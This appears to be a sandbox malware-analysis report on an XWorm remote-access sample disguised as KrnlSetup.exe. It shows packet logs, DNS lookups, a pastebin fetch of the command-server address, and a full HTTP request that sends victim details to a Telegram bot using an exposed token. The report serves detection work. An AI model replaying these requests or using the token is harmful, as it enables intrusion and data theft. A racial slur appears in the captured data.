                                                                              Dec 10, 2024 10:05:23.328594923 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.358201027 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.358370066 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.358413935 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.447947979 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.448019028 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.567867041 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.567924023 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.687199116 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.687429905 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.802373886 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.802603960 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.806757927 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.836436987 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.921989918 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.922163963 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.956199884 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.956212044 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.041611910 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.045610905 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.165127993 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.165328979 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.284615040 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.284666061 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.399358034 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.399410963 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.404016018 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.518837929 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.530556917 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.540311098 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.649883032 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.659935951 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.659945965 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.659984112 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.660069942 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.660200119 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.660273075 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.779345989 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.779401064 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.898885965 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.898961067 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.018382072 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.018450022 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.137795925 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.137856007 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.201508045 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.239911079 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.257397890 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.359719992 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.359803915 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.359879971 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.479237080 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.479547977 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.599037886 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.601845026 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.721101999 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.721164942 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.841933966 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.842004061 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.929080009 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.929310083 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.958760023 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.961394072 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.049031019 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.049097061 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.078579903 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078593016 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078602076 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078610897 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078641891 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078649998 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078690052 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078699112 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078707933 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078718901 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.169260025 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.169325113 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.204070091 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.288655043 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.288739920 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.323357105 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.408188105 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.408309937 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.527579069 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.527682066 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.647001028 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.647073984 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.688174963 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.735043049 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.747571945 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.757515907 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.758670092 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.766335011 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.876794100 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.876920938 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.876929998 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.876964092 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.877010107 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877093077 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877101898 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877214909 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877223969 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877233028 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877243996 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.878104925 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.996306896 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.011248112 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.130613089 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.146817923 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.268727064 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.269717932 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.317778111 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.375780106 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.389163017 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.390328884 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.419871092 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.596647024 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596664906 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596673012 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596682072 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596690893 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596699953 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596708059 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596715927 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596724033 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596733093 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596741915 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.596781969 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.743021965 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.743082047 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.862428904 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.862581015 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.982031107 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:27.982094049 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:27.982271910 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.031899929 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.037062883 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.142384052 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.142482996 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.156677961 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156689882 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156723022 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156732082 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156874895 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156985044 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.156995058 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.157005072 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.157125950 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.157135010 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.261833906 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.261890888 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.382380009 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.382436037 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.504112005 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.504164934 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.623925924 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.624003887 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.654561043 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.691987038 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.786111116 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.789710045 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:28.811574936 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.811598063 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.811726093 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.811768055 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.811871052 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.811924934 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.812099934 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.812108040 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.812313080 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.812321901 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.909250021 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:28.911765099 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.031155109 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.031214952 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.150691032 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.152822971 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.257051945 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.257744074 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.273550034 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.273972988 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.300374985 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.377110004 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.393162012 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.393723965 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.419879913 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.419950962 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.419960976 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.419970036 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.419980049 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.420008898 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.420017958 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.420104027 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.420125961 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.420218945 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.513109922 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.513756037 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.633264065 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.633790970 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.753144026 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.753195047 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.838493109 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.873114109 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.891334057 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:29.892860889 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:29.899276972 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:30.061548948 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:30.062076092 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.181102991 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.181121111 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.181138992 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.181147099 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.181164980 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:30.181262016 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.181272030 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.181303024 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.181349993 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.181441069 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.181480885 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.300570965 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:30.300781965 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:30.300894022 CET4975137593192.168.2.4115.69.183.222

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 10, 2024 10:03:59.358089924 CET5033553192.168.2.41.1.1.1
                                                                              Dec 10, 2024 10:03:59.495337009 CET53503351.1.1.1192.168.2.4
                                                                              Dec 10, 2024 10:04:56.928689957 CET5423153192.168.2.41.1.1.1
                                                                              Dec 10, 2024 10:04:57.065370083 CET53542311.1.1.1192.168.2.4
                                                                              Dec 10, 2024 10:04:59.252188921 CET5577953192.168.2.41.1.1.1
                                                                              Dec 10, 2024 10:04:59.390772104 CET53557791.1.1.1192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 10, 2024 10:03:59.358089924 CET192.168.2.41.1.1.10xc8cfStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                              Dec 10, 2024 10:04:56.928689957 CET192.168.2.41.1.1.10x115Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                              Dec 10, 2024 10:04:59.252188921 CET192.168.2.41.1.1.10x126fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 10, 2024 10:03:59.495337009 CET1.1.1.1192.168.2.40xc8cfNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                              Dec 10, 2024 10:04:57.065370083 CET1.1.1.1192.168.2.40x115No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                              Dec 10, 2024 10:04:57.065370083 CET1.1.1.1192.168.2.40x115No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                              Dec 10, 2024 10:04:57.065370083 CET1.1.1.1192.168.2.40x115No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                              Dec 10, 2024 10:04:59.390772104 CET1.1.1.1192.168.2.40x126fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • pastebin.com
                                                                              • api.telegram.org
                                                                              • ip-api.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449730208.95.112.1807120C:\Users\user\Desktop\KrnlSetup.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 10, 2024 10:03:59.623087883 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                              Host: ip-api.com
                                                                              Connection: Keep-Alive
                                                                              Dec 10, 2024 10:04:00.782250881 CET175INHTTP/1.1 200 OK
                                                                              Date: Tue, 10 Dec 2024 09:04:00 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 6
                                                                              Access-Control-Allow-Origin: *
                                                                              X-Ttl: 60
                                                                              X-Rl: 44
                                                                              Data Raw: 66 61 6c 73 65 0a
                                                                              Data Ascii: false


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449739104.20.3.2354437120C:\Users\user\Desktop\KrnlSetup.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-10 09:04:58 UTC74OUTGET /raw/5FinF5Mf HTTP/1.1
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              2024-12-10 09:04:59 UTC388INHTTP/1.1 200 OK
                                                                              Date: Tue, 10 Dec 2024 09:04:58 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-frame-options: DENY
                                                                              x-content-type-options: nosniff
                                                                              x-xss-protection: 1;mode=block
                                                                              cache-control: public, max-age=1801
                                                                              CF-Cache-Status: MISS
                                                                              Last-Modified: Tue, 10 Dec 2024 09:04:58 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8efc120e089442a6-EWR
                                                                              2024-12-10 09:04:59 UTC26INData Raw: 31 34 0d 0a 31 31 35 2e 36 39 2e 31 38 33 2e 32 32 32 3a 33 37 35 39 33 0d 0a
                                                                              Data Ascii: 14115.69.183.222:37593
                                                                              2024-12-10 09:04:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449745149.154.167.2204437120C:\Users\user\Desktop\KrnlSetup.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-10 09:05:00 UTC447OUTGET /bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEF8C18E803B11A27265E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VO319YB%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20niggereezzzz HTTP/1.1
                                                                              Host: api.telegram.org
                                                                              Connection: Keep-Alive
                                                                              2024-12-10 09:05:01 UTC388INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0
                                                                              Date: Tue, 10 Dec 2024 09:05:01 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 445
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              2024-12-10 09:05:01 UTC445INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 35 32 31 30 36 31 37 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 61 74 69 6f 73 20 73 6c 75 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 61 74 69 6f 73 6c 75 74 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 39 39 39 31 33 37 34 33 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 63 6f 73 6d 69 63 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 61 74 69 6f 6b 69 64 75 77 75 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 38 32 31 35 30 31 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58
                                                                              Data Ascii: {"ok":true,"result":{"message_id":2618,"from":{"id":6521061783,"is_bot":true,"first_name":"Katios slut","username":"katioslutbot"},"chat":{"id":5999137434,"first_name":"cosmic","username":"katiokiduwu","type":"private"},"date":1733821501,"text":"\u2620 [X


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:04:03:54
                                                                              Start date:10/12/2024
                                                                              Path:C:\Users\user\Desktop\KrnlSetup.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\KrnlSetup.exe"
                                                                              Imagebase:0x1c0000
                                                                              File size:89'600 bytes
                                                                              MD5 hash:493AC3E54BAE1F0D5A31B68348352F6C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2614356137.00000000025EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2614356137.0000000002597000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
